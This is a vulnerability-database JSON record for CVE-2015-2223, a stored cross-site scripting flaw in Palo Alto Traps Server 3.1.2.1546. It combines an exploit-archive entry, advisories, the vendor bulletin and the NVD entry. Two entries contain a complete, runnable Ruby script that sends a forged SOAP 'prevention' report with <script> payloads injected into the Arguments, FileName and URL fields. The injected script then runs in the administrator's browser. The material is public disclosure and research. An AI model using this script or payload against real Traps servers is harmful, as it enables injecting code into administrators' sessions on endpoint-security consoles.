{"lastseen": "2020-04-01T19:04:42", "references": [], "description": "\nPalo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting", "edition": 2, "reporter": "Michael Hendrickx", "exploitpack": {"type": "webapps", "platform": "windows"}, "published": "2015-03-31T00:00:00", "title": "Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2223"]}, {"type": "exploitdb", "idList": ["EDB-ID:36580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131182"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32117", "SECURITYVULNS:VULN:14485"]}, {"type": "zdt", "idList": ["1337DAY-ID-23458"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-2223"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131182"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0001"]}, {"type": "zdt", "idList": ["1337DAY-ID-23458"]}]}, "exploitation": null, "vulnersScore": -0.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2223"], "modified": "2015-03-31T00:00:00", "id": "EXPLOITPACK:1BCC2DF968B7C9665293BE3C836B88DF", "href": "", "viewCount": 5, "sourceData": "#!/usr/bin/ruby\n=begin\n------------------------------------------------------------------------\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\nVendor: Palo Alto Networks\nVulnerable Version(s): 3.1.2.1546\nTested Version: 3.1.2.1546\nAdvisory Publication: 29 March 2015 \nVendor Notification: 17 October 2014 \nVulnerability Type: Stored Cross Site Scripting \nCVE Reference: CVE-2015-2223\nRisk Level: High\nSolution Status: \nDiscovered and Provided: Michael Hendrickx, help AG\n------------------------------------------------------------------------\n\nAbout the product:\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\n\nAbout the vulnerability:\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\n\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\n\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n <script>\n alert(\"xss\");\n </script>\n </b:Arguments>\n\nA POC script can be found at the following URL:\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\n\n------------------------------------------------------------------------\n\nSolution:\n\nThe vendor was notified back in October 2014, and a we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. \n\nReferences:\n\n[1] help AG middle East: http://www.helpag.com/ \n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \n------------------------------------------------------------------------\n=end\n\n# PA traps fuzzer? :)\n\nrequire 'net/http'\n\ndef usage\n\tputs \"pa_traps.rb <trapserver>\"\n\texit\nend\n\nusage if ARGV.empty?\n\n# get the arguments\ntraps = {}\ntraps[:server] = ARGV[0]\ntraps[:port] = 2125\n\nhttp_headers = {\n\t\"Content-Type\" => \"application/soap+xml; charset=utf-8\", \n\t\"Expect\" => \"100-continue\",\n\t\"Connection\" => \"Keep-Alive\"\n}\n\nsoap_envelope = <<-SOAP\n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\">\n\t<s:Header>\n\t\t<a:Action s:mustUnderstand=\"1\">http://tempuri.org/IClientServices/SendPreventions</a:Action>\n\t\t<a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>\n\t\t<a:ReplyTo>\n\t\t\t<a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>\n\t\t</a:ReplyTo>\n\t\t<a:To s:mustUnderstand=\"1\">http://10.13.6.82:2125/CyveraServer/</a:To>\n\t</s:Header>\n\t<s:Body>\n\t\t<SendPreventions xmlns=\"http://tempuri.org/\">\n\t\t\t<machine>VMNAME1</machine>\n\t\t\t<preventions xmlns:b=\"http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\">\n\t\t\t\t<b:PreventionDetails>\n\t\t\t\t\t<b:Id>0</b:Id>\n\t\t\t\t\t<b:MachineName>AEDXBNB-MHE</b:MachineName>\n\t\t\t\t\t<b:Message>Exploit attempt was prevented by Traps</b:Message>\n\t\t\t\t\t<b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>\n\t\t\t\t\t<b:ProcessName>Excel.exe</b:ProcessName>\n\t\t\t\t\t<b:Time>2014-10-15T13:18:56</b:Time>\n\t\t\t\t\t<b:UserName> HELPAG\\\\hendrickx </b:UserName>\n\t\t\t\t\t<b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:Arguments>\n\t\t\t\t\t<b:CyveraCode>EXEPROT</b:CyveraCode>\n\t\t\t\t\t<b:CyveraInternalCode i:nil=\"true\"/>\n\t\t\t\t\t<b:CyveraVersion>3.1.2.1546</b:CyveraVersion>\n\t\t\t\t\t<b:FileName>\n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:FileName>\n\t\t\t\t\t<b:PreventionMode>Notify</b:PreventionMode>\n\t\t\t\t\t<b:ProcessHash i:nil=\"true\"/>\n\t\t\t\t\t<b:ProcessVersion>1.12.1.0</b:ProcessVersion>\n\t\t\t\t\t<b:Sent>false</b:Sent>\n\t\t\t\t\t<b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>\n\t\t\t\t\t<b:Source>Unknown</b:Source>\n\t\t\t\t\t<b:Status i:nil=\"true\"/>\n\t\t\t\t\t<b:URL>\n\t\t\t\t\t\t<script>\n\t\t\t\t\t\t\talert(\"xss in URL\");\n\t\t\t\t\t\t</script>\n\t\t\t\t\t</b:URL>\n\t\t\t\t</b:PreventionDetails>\n\t\t\t</preventions>\n\t\t</SendPreventions>\n\t</s:Body>\n</s:Envelope>\nSOAP\n\nif traps[:server].empty?\n\tputs \"Need a traps server\"\n\tusage\nend\n\n# summary\nputs \"Testing #{traps[:server]}\"\n\nNet::HTTP.start(traps[:server], traps[:port]) do |http|\n\tr1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);\n\tputs r1\n\tputs r1.inspect\nend", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "scheme": null, "_state": {"dependencies": 1659994789, "score": 1659995475}, "_internal": {"score_hash": "b3256a38ba6f73cfb7c4f5ce548c3869"}}
{"paloalto": [{"lastseen": "2021-07-28T14:33:10", "description": "A cross-site scripting vulnerability exists in the web-based console management. This vulnerability has been assigned CVE-2015-2223.\nThis issue affects the management interface of Traps, where an authenticated administrator may be tricked into injecting malicious JavaScript into the web UI interface.\nThis issue affects Traps ESM Console version 3.2.1 and earlier\n\n**Work around:**\nNo work around available.", "cvss3": {}, "published": "2016-02-23T08:00:00", "type": "paloalto", "title": "ESM Console XSS vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2016-02-23T08:00:00", "id": "PAN-SA-2016-0001", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2015-2223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-01-03T21:14:04", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2015-04-02T00:00:00", "type": "zdt", "title": "Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2223"], "modified": "2015-04-02T00:00:00", "id": "1337DAY-ID-23458", "href": "https://0day.today/exploit/description/23458", "sourceData": "#!/usr/bin/ruby\r\n=begin\r\n------------------------------------------------------------------------\r\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\r\nVendor: Palo Alto Networks\r\nVulnerable Version(s): 3.1.2.1546\r\nTested Version: 3.1.2.1546\r\nAdvisory Publication: 29 March 2015\r\nVendor Notification: 17 October 2014\r\nVulnerability Type: Stored Cross Site Scripting\r\nCVE Reference: CVE-2015-2223\r\nRisk Level: High\r\nSolution Status:\r\nDiscovered and Provided: Michael Hendrickx, help AG\r\n------------------------------------------------------------------------\r\n \r\nAbout the product:\r\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\r\n \r\nAbout the vulnerability:\r\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\r\n \r\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\r\n \r\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\"\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:Arguments>\r\n \r\nA POC script can be found at the following URL:\r\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\r\n \r\n------------------------------------------------------------------------\r\n \r\nSolution:\r\n \r\nThe vendor was notified back in October 2014, and a we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. \r\n \r\nReferences:\r\n \r\n[1] help AG middle East: http://www.helpag.com/\r\n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html\r\n------------------------------------------------------------------------\r\n=end\r\n \r\n# PA traps fuzzer? :)\r\n \r\nrequire 'net/http'\r\n \r\ndef usage\r\n puts \"pa_traps.rb <trapserver>\"\r\n exit\r\nend\r\n \r\nusage if ARGV.empty?\r\n \r\n# get the arguments\r\ntraps = {}\r\ntraps[:server] = ARGV[0]\r\ntraps[:port] = 2125\r\n \r\nhttp_headers = {\r\n \"Content-Type\" => \"application/soap+xml; charset=utf-8\",\r\n \"Expect\" => \"100-continue\",\r\n \"Connection\" => \"Keep-Alive\"\r\n}\r\n \r\nsoap_envelope = <<-SOAP\r\n<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\">\r\n <s:Header>\r\n <a:Action s:mustUnderstand=\"1\">http://tempuri.org/IClientServices/SendPreventions</a:Action>\r\n <a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID>\r\n <a:ReplyTo>\r\n <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>\r\n </a:ReplyTo>\r\n <a:To s:mustUnderstand=\"1\">http://10.13.6.82:2125/CyveraServer/</a:To>\r\n </s:Header>\r\n <s:Body>\r\n <SendPreventions xmlns=\"http://tempuri.org/\">\r\n <machine>VMNAME1</machine>\r\n <preventions xmlns:b=\"http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <b:PreventionDetails>\r\n <b:Id>0</b:Id>\r\n <b:MachineName>AEDXBNB-MHE</b:MachineName>\r\n <b:Message>Exploit attempt was prevented by Traps</b:Message>\r\n <b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey>\r\n <b:ProcessName>Excel.exe</b:ProcessName>\r\n <b:Time>2014-10-15T13:18:56</b:Time>\r\n <b:UserName> HELPAG\\\\hendrickx </b:UserName>\r\n <b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\"\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:Arguments>\r\n <b:CyveraCode>EXEPROT</b:CyveraCode>\r\n <b:CyveraInternalCode i:nil=\"true\"/>\r\n <b:CyveraVersion>3.1.2.1546</b:CyveraVersion>\r\n <b:FileName>\r\n <script>\r\n alert(\"xss\");\r\n </script>\r\n </b:FileName>\r\n <b:PreventionMode>Notify</b:PreventionMode>\r\n <b:ProcessHash i:nil=\"true\"/>\r\n <b:ProcessVersion>1.12.1.0</b:ProcessVersion>\r\n <b:Sent>false</b:Sent>\r\n <b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime>\r\n <b:Source>Unknown</b:Source>\r\n <b:Status i:nil=\"true\"/>\r\n <b:URL>\r\n <script>\r\n alert(\"xss in URL\");\r\n </script>\r\n </b:URL>\r\n </b:PreventionDetails>\r\n </preventions>\r\n </SendPreventions>\r\n </s:Body>\r\n</s:Envelope>\r\nSOAP\r\n \r\nif traps[:server].empty?\r\n puts \"Need a traps server\"\r\n usage\r\nend\r\n \r\n# summary\r\nputs \"Testing #{traps[:server]}\"\r\n \r\nNet::HTTP.start(traps[:server], traps[:port]) do |http|\r\n r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers);\r\n puts r1\r\n puts r1.inspect\r\nend\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/23458", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:38", "description": "", "published": "2015-03-30T00:00:00", "type": "packetstorm", "title": "Palo Alto Traps Server 3.1.2.1546 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2223"], "modified": "2015-03-30T00:00:00", "id": "PACKETSTORM:131182", "href": "https://packetstormsecurity.com/files/131182/Palo-Alto-Traps-Server-3.1.2.1546-Cross-Site-Scripting.html", "sourceData": "`------------------------------------------------------------------------ \nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection) \nVendor: Palo Alto Networks \nVulnerable Version(s): 3.1.2.1546 \nTested Version: 3.1.2.1546 \nAdvisory Publication: 29 March 2015 \nVendor Notification: 17 October 2014 \nVulnerability Type: Stored Cross Site Scripting \nCVE Reference: CVE-2015-2223 \nRisk Level: High \nSolution Status: \nDiscovered and Provided: Michael Hendrickx, help AG \n------------------------------------------------------------------------ \n \nAbout the product: \nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u0093trap\u0094 to a central server for logging purposes. \n \nAbout the vulnerability: \nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u0092 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser. \n \nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example: \n \n<b:Arguments>\"C:\\\\Users\\\\Michael\\\\fake.exe\" \n<script> \nalert(\"xss\"); \n</script> \n</b:Arguments> \n \nA POC script can be found at the following URL: \nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb \n \n------------------------------------------------------------------------ \n \nSolution: \n \nThe vendor was notified back in October 2014, and a we\u0092ve sent a few follow ups since. Contact the vendor for the patch details. \n \nReferences: \n \n[1] help AG middle East: http://www.helpag.com/ \n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \n------------------------------------------------------------------------ \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131182/pats-xss.txt"}], "securityvulns": [{"lastseen": "2021-06-08T19:14:53", "description": "Stored XSS in logs.", "edition": 2, "cvss3": {}, "published": "2015-05-12T00:00:00", "type": "securityvulns", "title": "Palo Alto Traps Server XSS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2015-05-12T00:00:00", "id": "SECURITYVULNS:VULN:14485", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14485", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\n------------------------------------------------------------------------\r\nProduct: Palo Alto Traps Server (formerly Cyvera Endpoint Protection)\r\nVendor: Palo Alto Networks\r\nVulnerable Version(s): 3.1.2.1546\r\nTested Version: 3.1.2.1546\r\nAdvisory Publication: 29 March 2015 \r\nVendor Notification: 17 October 2014 \r\nVulnerability Type: Stored Cross Site Scripting \r\nCVE Reference: CVE-2015-2223\r\nRisk Level: High\r\nSolution Status: \r\nDiscovered and Provided: Michael Hendrickx, help AG\r\n------------------------------------------------------------------------\r\n\r\nAbout the product:\r\nPalo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this \u201ctrap\u201d to a central server for logging purposes.\r\n\r\nAbout the vulnerability:\r\nAn attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps\u2019 admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser.\r\n\r\nThe XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example:\r\n\r\n <b:Arguments>"C:\\Users\\Michael\\fake.exe" \r\n <script>\r\n alert("xss");\r\n </script>\r\n </b:Arguments>\r\n\r\nA POC script can be found at the following URL:\r\nhttps://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb\r\n\r\n------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nThe vendor was notified back in October 2014, and a we\u2019ve sent a few follow ups since. Contact the vendor for the patch details. \r\n\r\nReferences:\r\n\r\n[1] help AG middle East: http://www.helpag.com/ \r\n[2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html \r\n------------------------------------------------------------------------\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-12T00:00:00", "title": "CVE-2015-2223: Palo Alto Traps Server Stored XSS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32117", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32117", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T12:10:10", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the web-based console management interface in Palo Alto Networks Traps (formerly Cyvera Endpoint Protection) 3.1.2.1546 allow remote attackers to inject arbitrary web script or HTML via the (1) Arguments, (2) FileName, or (3) URL parameter in a SOAP request.", "cvss3": {}, "published": "2015-04-14T14:59:00", "type": "cve", "title": "CVE-2015-2223", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2223"], "modified": "2018-10-09T19:56:00", "cpe": ["cpe:/a:palo_alto_networks:traps:3.1.2.1546"], "id": "CVE-2015-2223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2223", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:palo_alto_networks:traps:3.1.2.1546:*:*:*:*:*:*:*"]}]}
Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting
